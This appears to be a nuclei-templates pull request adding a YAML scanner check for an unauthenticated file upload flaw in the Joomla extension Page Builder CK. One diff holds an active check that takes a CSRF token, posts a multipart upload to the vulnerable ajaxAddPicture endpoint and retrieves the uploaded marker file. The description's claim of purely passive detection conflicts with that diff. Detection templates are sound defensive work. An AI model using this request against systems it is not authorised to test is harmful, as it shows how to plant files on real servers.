### PR TITLE
Add template for CVE-2026-56290 unauthenticated file upload detection

### DIFF
--- a/http/cves/2026/CVE-2026-56290.yaml
+++ b/http/cves/2026/CVE-2026-56290.yaml
@@ -1,72 +1,97 @@
 id: CVE-2026-56290
 
 info:
-  name: Page Builder CK < 3.6.0 - Unauthenticated Arbitrary File Upload
-  author: panchiko-p
+  name: Page Builder CK <= 3.5.10 - Unauthenticated Arbitrary File Upload
+  author: panchiko-p,0x_Akoko
   severity: critical
   description: |
-    Joomla extension Page Builder CK before 3.6.0 contains an unauthenticated arbitrary file upload vulnerability due to improper access control in its file upload functionality, allowing remote attackers to upload executable files and achieve remote code execution.
+   Joomla Page Builder CK contains an unrestricted file upload vulnerability caused by lack of proper validation, letting unauthenticated attackers upload executable files and achieve remote code execution.
   impact: |
-    An unauthenticated attacker can upload and execute arbitrary files, resulting in full remote code execution on the server.
+   Unauthenticated attackers can upload executable files, leading to full remote code execution and complete system compromise.
+  remediation: |
+   Update to the latest version of Page Builder CK.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2026-56290
+    - https://cxsecurity.com/issue/WLB-2026070010
+    - https://www.exploit-db.com/exploits/52626
+    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2026-56290
-    cwe-id: CWE-434,CWE-284
-    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
-    cvss-score: 10.0
+    cwe-id: CWE-434
   metadata:
     verified: true
-    max-request: 2
-  tags: cve,cve2026,joomla,pagebuilderck,rce,kev
+    max-request: 3
+    vendor: joomlack
+    product: page_builder_ck
+    framework: joomla
+    shodan-query: http.html:"com_pagebuilderck"
+    fofa-query: body="com_pagebuilderck"
+  tags: cve,cve2026,joomla,pagebuilderck,file-upload,rce,intrusive
+
+variables:
+  marker: "{{to_lower(rand_base(8))}}"
+
+flow: http(1) && http(2) && http(3)
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/components/com_pagebuilderck/pagebuilderck.xml"
-      - "{{BaseURL}}/administrator/components/com_pagebuilderck/pagebuilderck.xml"
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
 
-    matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        words:
-          - "text/xml"
-          - "application/xml"
-        condition: or
-        part: header
-      - type: word
-        words:
-          - "<version>"
-        part: body
-      - type: word
-        words:
-          - "<creationDate>"
-          - "<author>"
-        condition: or
-        part: body
-      - type: word
-        words:
-          - "<html"
-          - "<!DOCTYPE"
-        condition: or
-        part: body
-        negative: true
       - type: dsl
         dsl:
-          - "compare_versions(trim_space(version), '< 3.6.0')"
+          - 'status_code == 200'
+          - 'contains(body, "csrf")'
+        condition: and
+        internal: true
+
     extractors:
       - type: regex
-        part: body
-        name: version
+        name: csrf_token
         group: 1
-        regex:
-          - '<version>(.*?)</version>'
         internal: true
-      - type: regex
-        part: body
-        group: 1
         regex:
-          - '<version>(.*?)</version>'
+          - 'name="([a-f0-9]{32})"\s+value="1"'
+          - 'csrf\.token"\s*:\s*"([a-f0-9]{32})"'
+
+  - raw:
+      - |
+        POST /index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&{{csrf_token}}=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPBCK
+        Referer: {{BaseURL}}/
+        Origin: {{BaseURL}}
+
+        ------WebKitFormBoundaryPBCK
+        Content-Disposition: form-data; name="path"
+
+        media/com_pagebuilderck/gfonts/
+        ------WebKitFormBoundaryPBCK
+        Content-Disposition: form-data; name="file"; filename="{{marker}}.txt"
+        Content-Type: text/plain
+
+        CVE-2026-56290-{{marker}}
+        ------WebKitFormBoundaryPBCK--
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /media/com_pagebuilderck/gfonts/{{marker}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "CVE-2026-56290-{{marker}}")'
+        condition: and

--- a/http/cves/2026/CVE-2026-56290.yaml
+++ b/http/cves/2026/CVE-2026-56290.yaml
@@ -1,0 +1,72 @@
+id: CVE-2026-56290
+
+info:
+  name: Page Builder CK < 3.6.0 - Unauthenticated Arbitrary File Upload
+  author: panchiko-p
+  severity: critical
+  description: |
+    Joomla extension Page Builder CK before 3.6.0 contains an unauthenticated arbitrary file upload vulnerability due to improper access control in its file upload functionality, allowing remote attackers to upload executable files and achieve remote code execution.
+  impact: |
+    An unauthenticated attacker can upload and execute arbitrary files, resulting in full remote code execution on the server.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-56290
+  classification:
+    cve-id: CVE-2026-56290
+    cwe-id: CWE-434,CWE-284
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
+    cvss-score: 10.0
+  metadata:
+    verified: true
+    max-request: 2
+  tags: cve,cve2026,joomla,pagebuilderck,rce,kev
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/components/com_pagebuilderck/pagebuilderck.xml"
+      - "{{BaseURL}}/administrator/components/com_pagebuilderck/pagebuilderck.xml"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "text/xml"
+          - "application/xml"
+        condition: or
+        part: header
+      - type: word
+        words:
+          - "<version>"
+        part: body
+      - type: word
+        words:
+          - "<creationDate>"
+          - "<author>"
+        condition: or
+        part: body
+      - type: word
+        words:
+          - "<html"
+          - "<!DOCTYPE"
+        condition: or
+        part: body
+        negative: true
+      - type: dsl
+        dsl:
+          - "compare_versions(trim_space(version), '< 3.6.0')"
+    extractors:
+      - type: regex
+        part: body
+        name: version
+        group: 1
+        regex:
+          - '<version>(.*?)</version>'
+        internal: true
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '<version>(.*?)</version>'


### PR DESCRIPTION
### PR Information
- This month multiple CVEs were released regarding critical vulnerabilities in various Joomla plugins. This template covers CVE-2026-56290, an unauthenticated arbitrary file upload vulnerability in Page Builder CK (CVSS 4.0: 10.0, Critical)
- No existing nuclei-templates coverage exists for Page Builder CK or this CVE.
- Detection is passive: reads the component's XML manifest file and does a version compare against the patched release (3.6.0), without triggering the upload endpoint.
- References: https://nvd.nist.gov/vuln/detail/CVE-2026-56290

### Template validation
- [x] Validated with a host running a vulnerable version 3.1.2 (True Positive)
- [x] Validated with a host running a patched version 3.6.0 (avoid False Positive)

Sample output against vulnerable instance:
[CVE-2026-56290] [http] [critical] http://localhost/joomla/.../pagebuilderck.xml ["3.1.2"]

### Additional References:
- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
